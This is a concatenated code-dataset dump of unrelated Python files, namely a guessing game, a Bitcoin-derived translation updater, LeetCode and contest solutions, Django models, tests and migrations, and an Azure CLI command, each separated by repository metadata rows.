    return easy if choice == "easy" else hard
def game():
    """Run one round of the number-guessing game on the console."""
    print(logo)
    #Choosing a random number between 1 and 100.
    print("Welcome to 0 to 100 real quick!")
    print("I'm thinking of a number between 1 and 100.")
    answer = randint(1, 100)
    turns = set_difficulty()
    #Repeat the guessing functionality if they get it wrong.
    guess = 0
    while guess != answer:
        print(f"You have {turns} attempts remaining to guess the number.")
        #Let the user guess a number.
        guess = int(input("Make a guess: "))
        #Track the number of turns and reduce by 1 if they get it wrong.
        # NOTE: on a correct guess check_answer returns None, so `turns`
        # becomes None; the loop still exits because guess == answer.
        turns = check_answer(guess, answer, turns)
        if turns == 0:
            print("You've run out of guesses, you lose.")
            return
        elif guess != answer:
            print("Guess again.")
# Start the game immediately when the script runs.
game()
| [
"noreply@github.com"
] | J4Jeffort.noreply@github.com |
2ac8a07f272d1eb7508a454f238f56c51236845b | 5f918e33bd1bf13b74b0bf36e8b56d4599fef719 | /contrib/devtools/update-translations.py | ea23131b5a7733fb1f95e0a0fa2637caf38662c4 | [
"MIT"
] | permissive | RareShares/RareShares | 37cfc84993813b62d92467490cb0f23f0ad25d98 | 106421188cf0feee76f364e205eeb9d4ea32e99e | refs/heads/master | 2021-01-25T14:22:23.509429 | 2018-03-10T13:41:26 | 2018-03-10T13:41:26 | 123,686,817 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,664 | py | #!/usr/bin/python
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Run this script from the root of the repository to update all translations from
transifex.
It will do the following automatically:
- fetch all translations using the tx tool
- post-process them into valid and committable format
- remove invalid control characters
- remove location tags (makes diffs less noisy)
TODO:
- auto-add new translations to the build system according to the translation process
'''
from __future__ import division, print_function
import subprocess
import re
import sys
import os
import io
import xml.etree.ElementTree as ET
# Name of transifex tool
TX = 'tx'
# Name of source language file
SOURCE_LANG = 'rareshares_en.ts'
# Directory with locale files
LOCALE_DIR = 'src/qt/locale'
# Minimum number of messages for translation to be considered at all
MIN_NUM_MESSAGES = 10
def check_at_repository_root():
    """Abort (exit code 1) unless the current directory is the repo root.

    The root is detected by the presence of a .git directory.
    """
    if os.path.exists('.git'):
        return
    print('No .git directory found')
    print('Execute this script at the root of the repository', file=sys.stderr)
    exit(1)
def fetch_all_translations():
    """Pull every translation from Transifex via the `tx` CLI; abort on failure."""
    # subprocess.call returns the tx exit status; nonzero means the pull failed.
    if subprocess.call([TX, 'pull', '-f', '-a']):
        print('Error while fetching translations', file=sys.stderr)
        exit(1)
def find_format_specifiers(s):
    '''Find all format specifiers in a string.

    Returns the character immediately following every '%' in *s* (so '%s'
    yields 's' and '%1' yields '1'); a lone '%' at the end of the string
    contributes nothing.
    '''
    pos = 0
    specifiers = []
    while True:
        percent = s.find('%', pos)
        if percent < 0:
            break
        try:
            specifiers.append(s[percent + 1])
        except IndexError:
            # A '%' as the very last character has no specifier after it.
            # Bug fix: narrowed from a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit and masked real bugs.
            print('Failed to get specifier')
        pos = percent + 2
    return specifiers
def split_format_specifiers(specifiers):
    '''Split format specifiers between numeric (Qt) and others (strprintf).

    Qt positional specifiers (%1..%9) may appear in any order, so they are
    returned as a set; strprintf specifiers are order-sensitive, so they
    remain a list in original order.
    '''
    qt_positional = set('123456789')
    numeric = {spec for spec in specifiers if spec in qt_positional}
    other = [spec for spec in specifiers if spec not in qt_positional]
    return numeric, other
def sanitize_string(s):
    '''Collapse newlines to spaces so the string prints on a single line.'''
    return ' '.join(s.split('\n'))
def check_format_specifiers(source, translation, errors, numerus):
    """Validate that *translation* uses the same format specifiers as *source*.

    Appends human-readable problems to *errors* (mutated in place) and
    returns False on any mismatch. *numerus* marks plural-form messages,
    which may legitimately omit the %n specifier.
    """
    source_f = split_format_specifiers(find_format_specifiers(source))
    # assert that no source messages contain both Qt and strprintf format specifiers
    # if this fails, go change the source as this is hacky and confusing!
    #assert(not(source_f[0] and source_f[1]))
    try:
        translation_f = split_format_specifiers(find_format_specifiers(translation))
    except IndexError:
        errors.append("Parse error in translation for '%s': '%s'" % (sanitize_string(source), sanitize_string(translation)))
        return False
    else:
        # Compare (Qt set, strprintf list) pairs: Qt order is irrelevant,
        # strprintf order matters.
        if source_f != translation_f:
            if numerus and source_f == (set(), ['n']) and translation_f == (set(), []) and translation.find('%') == -1:
                # Allow numerus translations to omit %n specifier (usually when it only has one possible value)
                return True
            errors.append("Mismatch between '%s' and '%s'" % (sanitize_string(source), sanitize_string(translation)))
            return False
    return True
def all_ts_files(suffix=''):
    """Yield (filename, filepath) for each translation file in LOCALE_DIR.

    Skips the source-language file. When *suffix* is given (e.g. '.orig'),
    only files ending in '.ts<suffix>' match and the suffix is stripped, so
    the yielded path always points at the plain .ts location.
    """
    for filename in os.listdir(LOCALE_DIR):
        # process only language files, and do not process source language
        if not filename.endswith('.ts'+suffix) or filename == SOURCE_LANG+suffix:
            continue
        if suffix: # remove provided suffix
            filename = filename[0:-len(suffix)]
        filepath = os.path.join(LOCALE_DIR, filename)
        yield(filename, filepath)
# C0 control bytes that XML 1.0 forbids: everything below 0x20 except
# newline (0x0a) and carriage return (0x0d). Note this includes tab (0x09).
FIX_RE = re.compile(b'[\x00-\x09\x0b\x0c\x0e-\x1f]')
def remove_invalid_characters(s):
    '''Strip control bytes that would make the XML parser reject the data.'''
    return re.sub(FIX_RE, b'', s)
# Override cdata escape function to make our output match Qt's (optional, just for cleaner diffs for
# comparison, disable by default)
# Holds ElementTree's original _escape_cdata; populated by
# postprocess_translations when reduce_diff_hacks is enabled.
_orig_escape_cdata = None
def escape_cdata(text):
    # Delegate to the stashed ElementTree implementation, then add Qt's
    # extra apostrophe/quote entity escaping on top.
    text = _orig_escape_cdata(text)
    text = text.replace("'", '&apos;')
    text = text.replace('"', '&quot;')
    return text
def postprocess_translations(reduce_diff_hacks=False):
    """Sanitize every fetched .ts file into committable form.

    Renames each file to .ts.orig, re-parses it with control characters
    stripped, drops invalid/unfinished translations and <location> tags,
    removes near-empty files entirely, and writes the cleaned tree back to
    the .ts path. Returns True if any format-specifier errors were found.

    When *reduce_diff_hacks* is set, ElementTree's cdata escaping is
    monkey-patched (see escape_cdata) and self-closing tags are compacted
    so output matches Qt's own formatting for cleaner diffs.
    """
    print('Checking and postprocessing...')
    if reduce_diff_hacks:
        global _orig_escape_cdata
        _orig_escape_cdata = ET._escape_cdata
        ET._escape_cdata = escape_cdata
    # Move originals aside; the cleaned versions are written to the .ts paths.
    for (filename,filepath) in all_ts_files():
        os.rename(filepath, filepath+'.orig')
    have_errors = False
    for (filename,filepath) in all_ts_files('.orig'):
        # pre-fixups to cope with transifex output
        parser = ET.XMLParser(encoding='utf-8') # need to override encoding because 'utf8' is not understood only 'utf-8'
        with open(filepath + '.orig', 'rb') as f:
            data = f.read()
        # remove control characters; this must be done over the entire file otherwise the XML parser will fail
        data = remove_invalid_characters(data)
        tree = ET.parse(io.BytesIO(data), parser=parser)
        # iterate over all messages in file
        root = tree.getroot()
        for context in root.findall('context'):
            for message in context.findall('message'):
                numerus = message.get('numerus') == 'yes'
                source = message.find('source').text
                translation_node = message.find('translation')
                # pick all numerusforms
                if numerus:
                    translations = [i.text for i in translation_node.findall('numerusform')]
                else:
                    translations = [translation_node.text]
                for translation in translations:
                    if translation is None:
                        continue
                    errors = []
                    valid = check_format_specifiers(source, translation, errors, numerus)
                    for error in errors:
                        print('%s: %s' % (filename, error))
                    if not valid: # set type to unfinished and clear string if invalid
                        translation_node.clear()
                        translation_node.set('type', 'unfinished')
                        have_errors = True
                # Remove location tags
                for location in message.findall('location'):
                    message.remove(location)
                # Remove entire message if it is an unfinished translation
                if translation_node.get('type') == 'unfinished':
                    context.remove(message)
        # check if document is (virtually) empty, and remove it if so
        num_messages = 0
        for context in root.findall('context'):
            for message in context.findall('message'):
                num_messages += 1
        if num_messages < MIN_NUM_MESSAGES:
            # Too few messages to be worth shipping; the .ts file stays
            # deleted (only the .orig copy remains).
            print('Removing %s, as it contains only %i messages' % (filepath, num_messages))
            continue
        # write fixed-up tree
        # if diff reduction requested, replace some XML to 'sanitize' to qt formatting
        if reduce_diff_hacks:
            out = io.BytesIO()
            tree.write(out, encoding='utf-8')
            out = out.getvalue()
            out = out.replace(b' />', b'/>')
            with open(filepath, 'wb') as f:
                f.write(out)
        else:
            tree.write(filepath, encoding='utf-8')
    return have_errors
if __name__ == '__main__':
    check_at_repository_root()
    # Fetching from Transifex is currently disabled; run `tx pull` manually
    # (or re-enable the call below) before postprocessing.
    # fetch_all_translations()
    postprocess_translations()
| [
"raresharesoffical@gmail.com"
] | raresharesoffical@gmail.com |
8c951a4ff5799e9f19a66c7679c2cbb6760522b1 | 593ecc21a7164ec293f23d75423e71ab3d9f3c54 | /LC29.py | 4851f8eb59c6ba7f464b3e832b78b17bb3b30c3a | [] | no_license | luckmimi/leetcode | e297c11960f0c72370523e5594d789bc4d55cf7c | 2257c6202e823a5cd71b630441c430f1bd08a896 | refs/heads/master | 2022-07-11T22:36:02.634148 | 2022-06-30T22:57:20 | 2022-06-30T22:57:20 | 214,880,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | class Solution:
def divide(self, dividend: int, divisor: int) -> int:
sign = -1 if (dividend < 0) ^ (divisor < 0) else 1
a = abs(dividend)
b = abs(divisor)
res = 0
while b<= a:
mul = 1
tmp = b
while a >= (tmp <<1):
tmp <<= 1
mul <<= 1
res += mul
a -= tmp
res *= sign
if res > 2**31 -1 :
return 2** 31 -1
else:
return res
| [
"noreply@github.com"
] | luckmimi.noreply@github.com |
8353ef4acb242fe986fdb33c56b988044cd5b5a2 | b0c38490e306ba76b5d8509feb902b9cfb1f6c3c | /0007.ReverseInteger.py | 50240080df86bd10c6a3d818e57aaf6c73b3142b | [] | no_license | hopkeinst/leetCode | d67234983a5c92aa1e2a1ed986c82bc8ab4edee7 | e43d23f9581f6a13c59b558f4d04e2f469eb146e | refs/heads/main | 2023-06-08T15:14:25.827666 | 2021-06-22T17:53:40 | 2021-06-22T17:53:40 | 379,353,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | class Solution:
def reverse(self, x: int) -> int:
if x < 0:
x = x*(-1)
strInt = str(x)
strInt = strInt[::-1]
y = (int(strInt))*(-1)
else:
strInt = str(x)
strInt = strInt[::-1]
y = int(strInt)
minimo = (2**31)*(-1)
maximo = (2**31)
if (y < minimo) or (y > maximo):
y = 0
return y | [
"hopkeinst@gmail.com"
] | hopkeinst@gmail.com |
5fd1184dce2377d92e2ff473b987d718c97bf42f | 5bd3122d230471b048429f5e9c49a0b39c8a54fc | /Atcoder_contests/ARC/R102A.py | 5e0b5a9bf32372b1adfd5381f0b6c1bc75432986 | [] | no_license | nao1412/Competitive_Programing_Codes | e230e2fa85027e41c5ee062083801bb299effe9b | 98c29b5ba75e75502cf27fcf365a7aedcd6c273c | refs/heads/main | 2023-06-05T18:45:59.733301 | 2021-06-23T15:02:25 | 2021-06-23T15:02:25 | 374,061,897 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | import sys
sys.setrecursionlimit(10**7) # raise the recursion limit (contest boilerplate)
import math
# Short stdin helpers, typical competitive-programming boilerplate:
# I=int, LI=list of ints, MI=int iterator, S=string, LS=list of strings,
# H=n raw lines.
def I(): return int(input())
def LI(): return list(map(int, input().split()))
def MI(): return map(int, input().split())
def S(): return input()
def LS(): return list(map(str, input().split()))
def H(n): return [input() for i in range(n)]
mod = 10**9 + 7
def main():
    # Reads n and k from stdin; prints a count built from two bucket sizes.
    n, k = MI()
    if k % 2 == 0:
        # n1: how many i in [1, n] are multiples of k (i % k == 0).
        n1 = n // k
        n2 = n1
        # n2: presumably how many i satisfy i % k == k/2 — one more than n1
        # when the remainder reaches k/2. TODO confirm against the problem.
        if n % k >= k // 2:
            n2 = n1 + 1
    else:
        # Odd k: only exact multiples of k contribute.
        n1 = n // k
        n2 = 0
    # Each bucket contributes bucket_size**3 ordered triples.
    print(n1**3+n2**3)
if __name__ == '__main__':
    main()
"naoya_greeeen_0720@icloud.com"
] | naoya_greeeen_0720@icloud.com |
2c40659ad32ee2fff91d40dfffe5d5e7891e4a47 | fc7d6fa5267d2770e4ddb327da048811a3f5ba11 | /echo/tests.py | 551ff1913cfe0e4eddffcf95e0c06b906ad12cb1 | [
"MIT"
] | permissive | Xorcerer/cookiecutter-playground | ba53af3b276f15eed5167c60517213b7a5a6e84f | 6b58f5437ef06127f4cb4e8ce510d77cb45b7b69 | refs/heads/master | 2021-04-09T17:15:19.539970 | 2018-03-20T15:14:41 | 2018-03-20T15:14:41 | 125,874,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 600 | py | import json
from django.test import TestCase
# Create your tests here.
class EchoViewTestCase(TestCase):
    """Integration tests for the /api/v1/echo endpoint."""
    def test_echo_basic_call(self):
        # Happy path: the endpoint echoes the `msg` query parameter back.
        response = self.client.get('/api/v1/echo?msg=hello-world')
        self.assertEqual(response.status_code, 200)
        content = json.loads(response.content)
        self.assertEqual(content['msg'], 'hello-world')
    def test_echo_missing_msg(self):
        # Omitting `msg` is a client error; the body reports it under 'error'.
        response = self.client.get('/api/v1/echo')
        self.assertEqual(response.status_code, 400)
        content = json.loads(response.content)
        self.assertTrue('error' in content)
"xorcererzc@gmail.com"
] | xorcererzc@gmail.com |
b78816d355385165c2d46725802b6c6001eae314 | b1c99061474c4e2f2653f6f3d83931c949c58b13 | /Basic/chapter3/ReplaceTest.py | 1f7aca0428b31758f691b5eb62156031c05dd93f | [] | no_license | hyperaeon/python | df75346040a5ccc588e21b0d761493c59e1a4fe3 | 21d10ef7af3227d29092a6720666c0db8e418ec4 | refs/heads/master | 2016-09-14T08:58:53.794960 | 2016-04-26T05:34:56 | 2016-04-26T05:34:56 | 57,100,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | __author__ = 'hzliyong'
cookie = '_da_ntes_uid=3LhpAfObU48aiOR0b28yZYXv;'
cookie = cookie.replace(';','')
print(cookie)
list
type = 'a'
if type == 'a':
list = 'type a'
if type == 'b':
list = 'type b'
print(list) | [
"hzliyong@corp.netease.com"
] | hzliyong@corp.netease.com |
35864f483211ec58d910fa7a044c9451e6081165 | c6dcf176b57c2d7f55d758ae41c13898ac691353 | /Quikok/amigo/migrations/0001_initial.py | 0f187487bf27080960c482cf677fd52b8267c0c5 | [] | no_license | chikuku/QUIKOK | 137c4ed5bb902bee1864c1786f3a2fa8658a1ac0 | 7a292671a355ae58f3889036d8da199b3801d321 | refs/heads/master | 2023-05-29T15:39:28.764786 | 2021-05-19T13:57:11 | 2021-05-19T13:57:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 917 | py | # Generated by Django 3.1.5 on 2021-03-17 14:36
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='exam_bank_sales_set',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('duration', models.CharField(default='', max_length=30)),
('selling_price', models.IntegerField()),
('created_time', models.DateTimeField(auto_now_add=True)),
('updated_time', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': '題庫販售方案',
'verbose_name_plural': '題庫販售方案',
'ordering': ['-updated_time'],
},
),
]
| [
"tamio.chou@gmail.com"
] | tamio.chou@gmail.com |
b7b297c84c0c3d1db89a06f2929ee93d987e0691 | eab1abf41e3e1bd276258be7aedfb4f2dfcc1b1e | /web/mydjango/geoapp/admin.py | 3d75606cf3e3ff9b2630865dc8782c03b65cc335 | [] | no_license | javiermaly/docker-python3-django2-postgres-postgis-geodjango-nginx | 1732e0df8d1bd4624b3385ac6757b48060814814 | 8ea5f2c9ed90013bab76b468d44e7cbabf8122f6 | refs/heads/master | 2021-11-25T14:47:09.901801 | 2018-03-26T01:03:39 | 2018-03-26T01:03:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | from django.contrib import admin
from .models import GeoAlgo
@admin.register(GeoAlgo)
class GeoAlgoAdmin(admin.ModelAdmin):
    # Django admin config: show 'nombre' in the change list and allow
    # searching on it.
    list_display = ['nombre']
    search_fields = ['nombre']
"andres@data99.com.ar"
] | andres@data99.com.ar |
a844d9a4c5e02b4c709aab42b1439a95c95de7e6 | 4e5eb9d9273bc85fc8464393ae7a96a40dc6f37f | /contacts/app/migrations/0001_initial.py | 2dd8376e947f09b461173442e79c469ad513a4af | [] | no_license | Vaishali1219/contacts | de5acddd084b5a71554139ee07cc26638fa29dde | 2dd3c86f280dbd3018ca2950c6916c354f29ad5e | refs/heads/master | 2022-12-04T14:33:47.117406 | 2019-10-27T11:18:06 | 2019-10-27T11:18:06 | 217,843,907 | 0 | 0 | null | 2022-11-22T04:46:50 | 2019-10-27T11:18:30 | Python | UTF-8 | Python | false | false | 855 | py | # Generated by Django 2.2.4 on 2019-10-23 15:17
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 2.2.4 makemigrations (see header). Once
    # applied anywhere, keep the recorded operations stable — add a new
    # migration instead of editing this one.

    initial = True

    dependencies = [
    ]

    operations = [
        # Creates the Contact table with basic contact fields, an optional
        # image, and an auto-set creation date.
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=20)),
                ('email', models.EmailField(max_length=100)),
                ('phone', models.IntegerField()),
                ('info', models.CharField(choices=[('male', 'Male'), ('female', 'Female')], max_length=50)),
                ('image', models.ImageField(blank=True, upload_to='images/')),
                ('date_added', models.DateField(auto_now_add=True)),
            ],
        ),
    ]
| [
"46643151+Vaishali1219@users.noreply.github.com"
] | 46643151+Vaishali1219@users.noreply.github.com |
3c0948318554ab6edf9a4f53a5192b3d04e696dd | a4ea525e226d6c401fdb87a6e9adfdc5d07e6020 | /src/azure-cli/azure/cli/command_modules/network/aaz/profile_2018_03_01_hybrid/network/vnet_gateway/_list_learned_routes.py | 789b238597180231c9dcdc90049d592a0ae04769 | [
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] | permissive | Azure/azure-cli | 13340eeca2e288e66e84d393fa1c8a93d46c8686 | a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca | refs/heads/dev | 2023-08-17T06:25:37.431463 | 2023-08-17T06:00:10 | 2023-08-17T06:00:10 | 51,040,886 | 4,018 | 3,310 | MIT | 2023-09-14T11:11:05 | 2016-02-04T00:21:51 | Python | UTF-8 | Python | false | false | 6,877 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command(
    "network vnet-gateway list-learned-routes",
)
class ListLearnedRoutes(AAZCommand):
    """This operation retrieves a list of routes the virtual network gateway has learned, including routes learned from BGP peers.
    :example: Retrieve a list of learned routes.
        az network vnet-gateway list-learned-routes -g MyResourceGroup -n MyVnetGateway
    """
    # Generated by aaz-dev-tools: maps this command to the ARM
    # getLearnedRoutes POST action at api-version 2017-10-01.
    _aaz_info = {
        "version": "2017-10-01",
        "resources": [
            ["mgmt-plane", "/subscriptions/{}/resourcegroups/{}/providers/microsoft.network/virtualnetworkgateways/{}/getlearnedroutes", "2017-10-01"],
        ]
    }
    # Long-running operation: enables the --no-wait flag.
    AZ_SUPPORT_NO_WAIT = True
    def _handler(self, command_args):
        # Delegate argument binding to the base class, then run the
        # operations generator under an LRO poller.
        super()._handler(command_args)
        return self.build_lro_poller(self._execute_operations, self._output)
    _args_schema = None
    @classmethod
    def _build_arguments_schema(cls, *args, **kwargs):
        # Schema is built once and cached on the class.
        if cls._args_schema is not None:
            return cls._args_schema
        cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
        # define Arg Group ""
        _args_schema = cls._args_schema
        _args_schema.resource_group = AAZResourceGroupNameArg(
            required=True,
        )
        _args_schema.name = AAZStrArg(
            options=["-n", "--name"],
            help="Name of the VNet gateway.",
            required=True,
            id_part="name",
        )
        return cls._args_schema
    def _execute_operations(self):
        self.pre_operations()
        yield self.VirtualNetworkGatewaysGetLearnedRoutes(ctx=self.ctx)()
        self.post_operations()
    @register_callback
    def pre_operations(self):
        pass
    @register_callback
    def post_operations(self):
        pass
    def _output(self, *args, **kwargs):
        result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)
        return result
    class VirtualNetworkGatewaysGetLearnedRoutes(AAZHttpOperation):
        """HTTP operation wrapper for the getLearnedRoutes ARM action."""
        CLIENT_TYPE = "MgmtClient"
        def __call__(self, *args, **kwargs):
            request = self.make_request()
            session = self.client.send_request(request=request, stream=False, **kwargs)
            # NOTE(review): the 202 and 200 branches below are identical;
            # the generator emits one branch per accepted status code.
            if session.http_response.status_code in [202]:
                return self.client.build_lro_polling(
                    self.ctx.args.no_wait,
                    session,
                    self.on_200,
                    self.on_error,
                    lro_options={"final-state-via": "location"},
                    path_format_arguments=self.url_parameters,
                )
            if session.http_response.status_code in [200]:
                return self.client.build_lro_polling(
                    self.ctx.args.no_wait,
                    session,
                    self.on_200,
                    self.on_error,
                    lro_options={"final-state-via": "location"},
                    path_format_arguments=self.url_parameters,
                )
            return self.on_error(session.http_response)
        @property
        def url(self):
            return self.client.format_url(
                "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/getLearnedRoutes",
                **self.url_parameters
            )
        @property
        def method(self):
            return "POST"
        @property
        def error_format(self):
            return "MgmtErrorFormat"
        @property
        def url_parameters(self):
            parameters = {
                **self.serialize_url_param(
                    "resourceGroupName", self.ctx.args.resource_group,
                    required=True,
                ),
                **self.serialize_url_param(
                    "subscriptionId", self.ctx.subscription_id,
                    required=True,
                ),
                **self.serialize_url_param(
                    "virtualNetworkGatewayName", self.ctx.args.name,
                    required=True,
                ),
            }
            return parameters
        @property
        def query_parameters(self):
            parameters = {
                **self.serialize_query_param(
                    "api-version", "2017-10-01",
                    required=True,
                ),
            }
            return parameters
        @property
        def header_parameters(self):
            parameters = {
                **self.serialize_header_param(
                    "Accept", "application/json",
                ),
            }
            return parameters
        def on_200(self, session):
            # Store the deserialized response body in the context so
            # _output() can read it back via self.ctx.vars.instance.
            data = self.deserialize_http_content(session)
            self.ctx.set_var(
                "instance",
                data,
                schema_builder=self._build_schema_on_200
            )
        _schema_on_200 = None
        @classmethod
        def _build_schema_on_200(cls):
            # Response schema (built once, cached): a list of learned-route
            # objects; every field is server-populated (read_only).
            if cls._schema_on_200 is not None:
                return cls._schema_on_200
            cls._schema_on_200 = AAZObjectType()
            _schema_on_200 = cls._schema_on_200
            _schema_on_200.value = AAZListType()
            value = cls._schema_on_200.value
            value.Element = AAZObjectType()
            _element = cls._schema_on_200.value.Element
            _element.as_path = AAZStrType(
                serialized_name="asPath",
                flags={"read_only": True},
            )
            _element.local_address = AAZStrType(
                serialized_name="localAddress",
                flags={"read_only": True},
            )
            _element.network = AAZStrType(
                flags={"read_only": True},
            )
            _element.next_hop = AAZStrType(
                serialized_name="nextHop",
                flags={"read_only": True},
            )
            _element.origin = AAZStrType(
                flags={"read_only": True},
            )
            _element.source_peer = AAZStrType(
                serialized_name="sourcePeer",
                flags={"read_only": True},
            )
            _element.weight = AAZIntType(
                flags={"read_only": True},
            )
            return cls._schema_on_200
class _ListLearnedRoutesHelper:
    """Helper class for ListLearnedRoutes"""
# Public API of this module: only the command class itself.
__all__ = ["ListLearnedRoutes"]
| [
"noreply@github.com"
] | Azure.noreply@github.com |
e7d33cb382cca997ef56c3849ba3489bc73be785 | fd90b8efa1daaec44b54797e549e0f738f4a5897 | /jianzhioffer/16. 数值的整数次方.py | b6c886f4358eab1f50ae4aa820f45932b011e28a | [] | no_license | ddz-mark/LeetCode | 2a622eeb655398ca9ebd9feee93a52cd114a77c4 | d557faf87374ad8c65634ee9d9e572b88a54913a | refs/heads/master | 2021-07-12T06:58:57.162657 | 2021-04-18T13:25:03 | 2021-04-18T13:25:03 | 244,403,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,809 | py | # 实现函数double Power(double base, int exponent),求base的exponent次方。不得使用库函数,同时不需要考虑大数问题。
#
# 示例 1:
#
# 输入: 2.00000, 10
# 输出: 1024.00000
# 示例 2:
#
# 输入: 2.10000, 3
# 输出: 9.26100
# 示例 3:
#
# 输入: 2.00000, -2
# 输出: 0.25000
# 解释: 2-2 = 1/22 = 1/4 = 0.25
# Approach: fast exponentiation -- split the exponent into odd and even
# cases; when it is even, the base can be squared (x = x * x) and n halved.
# Parity test: (m + n) & 1 == 0 means (m + n) is even; == 1 means odd.
# Recursive idea, working backwards from the result, e.g.:
#   odd n:  return x * getPow(x, n - 1)
#   even n: return getPow(x * x, n // 2)
class Solution(object):
    """Compute x**n (myPow) via recursive fast exponentiation.

    Improvements over the original: comments translated to English and the
    large block of commented-out iterative code removed; the active
    recursive algorithm and its interface are unchanged.
    """

    def myPow(self, x, n):
        """Return ``x`` raised to the integer power ``n``.

        :type x: float
        :type n: int
        :rtype: float

        Handles negative exponents by inverting the base once
        (x**-n == (1/x)**n).  Raises ZeroDivisionError for x == 0 with
        n < 0, matching the original behavior.
        """
        if n == 0:
            # Any base to the zeroth power is 1.
            return 1
        elif n > 0:
            return self.getPow(x, n)
        else:
            return self.getPow(1 / x, -n)

    def getPow(self, x, n):
        """Recursive fast-power helper; requires n >= 1.

        Even exponent: square the base and halve n -- O(log n) depth.
        Odd exponent: peel off one factor of x.
        """
        # Base case first (recursive style).
        if n == 1:
            return x
        if n & 1 == 0:  # even exponent
            return self.getPow(x * x, n // 2)
        else:
            return x * self.getPow(x, n - 1)
# Manual smoke test: 2.0 ** 3 should print 8.0.
if __name__ == '__main__':
    solver = Solution()
    print(solver.myPow(2.0, 3))
| [
"dudaizhong@126.com"
] | dudaizhong@126.com |
02b17aabc9903be3583d686b43c3f0bb89d31eb6 | 757583830dd0fd637841f63374dd932a18cd314c | /tests/test_math_service.py | 3e81dc65e1027eebec5bd23f114abbcaa51d17b8 | [] | no_license | garmstrong87/mathservice | ec3dd038af7e61b70c8ee9014f1e2cdf2716f0bb | e311d50649cecc9fbae460c61d23fb327785dcf6 | refs/heads/master | 2016-09-05T15:22:49.797492 | 2013-12-14T16:40:17 | 2013-12-14T16:40:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,986 | py | #
# test_function_service.py - Perform unit tests to validate mappings and responses for the service.
#
import unittest
import json
from flask import Flask
import mathservice
import MathServiceError
class TestServiceFunctions(unittest.TestCase):
    """Unit tests validating the JSON mappings and responses of mathservice."""

    def setUp(self):
        # Fresh Flask app per test so request contexts can be simulated.
        self.app = Flask(__name__)
        self.app.config['TESTING'] = True

    def test_list_of_implemented_functions(self):
        # The listing endpoint must return a JSON object with a
        # 'functions' key naming each implemented function.
        payload = json.loads(mathservice.list_implemented_functions())
        self.assertTrue('functions' in payload)
        # Exactly two functions are currently implemented.
        self.assertEqual(len(payload['functions']), 2)

    def test_fibonacci_series_valid_response(self):
        # A valid request yields the function name, the list size, and the
        # series itself (3 numbers requested -> 3 returned).
        with self.app.test_request_context('/function/fibonacci?number=3'):
            payload = json.loads(mathservice.calculate_fibonacci_series())
            self.assertTrue('function' in payload)
            self.assertEqual(payload['function'], 'fibonacci')
            self.assertTrue('list_size' in payload)
            self.assertTrue('fibonacci_numbers' in payload)
            self.assertEqual(len(payload['fibonacci_numbers']), 3)

    def test_fibonacci_series_invalid_response(self):
        # A negative count produces the standard error envelope.
        with self.app.test_request_context('/function/fibonacci?number=-3'):
            payload = json.loads(mathservice.calculate_fibonacci_series())
            self.assertTrue('called_url' in payload)
            self.assertTrue('called_method' in payload)
            self.assertTrue('error_message' in payload)

    def test_fibonacci_series_sum_valid_response(self):
        # Sum endpoint: fib(1) + fib(2) + fib(3) = 0 + 1 + 1 = 2.
        with self.app.test_request_context('/function/fibonacci_sum?number=3'):
            payload = json.loads(mathservice.calculate_fibonacci_series_sum())
            self.assertTrue('function' in payload)
            self.assertEqual(payload['function'], 'fibonacci_sum')
            self.assertTrue('sum' in payload)
            self.assertEqual(payload['sum'], 2)

    def test_fibonacci_series_sum_invalid_response(self):
        # A negative count on the sum endpoint also yields the error envelope.
        with self.app.test_request_context('/function/fibonacci_sum?number=-3'):
            payload = json.loads(mathservice.calculate_fibonacci_series_sum())
            self.assertTrue('called_url' in payload)
            self.assertTrue('called_method' in payload)
            self.assertTrue('error_message' in payload)
# Run the suite directly (verbosity=2 prints one line per test).
if __name__ == '__main__':
    suite = unittest.TestLoader().loadTestsFromTestCase(TestServiceFunctions)
    unittest.TextTestRunner(verbosity = 2).run(suite)
"glenn@development.(none)"
] | glenn@development.(none) |
a30be694eca63a88eff2b727822bab6367cf71fe | d0dfd680e92e9b32f24e6e034571ad4323a58103 | /src/yeahml/information/write_info.py | e25421e67c2746d55a8337851f10397129d59851 | [
"Apache-2.0"
